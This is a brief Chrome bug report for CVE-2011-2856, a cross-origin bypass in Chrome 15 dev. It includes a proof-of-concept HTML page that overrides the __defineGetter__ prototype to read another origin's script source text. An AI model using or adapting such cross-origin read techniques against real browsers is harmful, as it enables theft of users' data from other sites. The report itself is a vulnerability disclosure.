CVE-2011-2856

Arbitrary cross-origin bypass using __defineGetter__ prototype override

Aug 18 2011

VULNERABILITY DETAILS

You can access cross-origin text by hooking into __defineGetter__ and using SourceLocation object.

REPRODUCTION CASE

<html>

<head>

  <script type="text/javascript">
    Object.prototype.
    `__defineGetter__` ("line", function() {
      alert(this.script.sourceSlice().sourceText());
    });
  </script>

  <script src="http://google.com"></script>

</head>

<body></body>

</html>

VERSION

Chrome Version: [15.0.854.0] + [dev] Operating System: [Win, 7, Service pack 1]

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=93416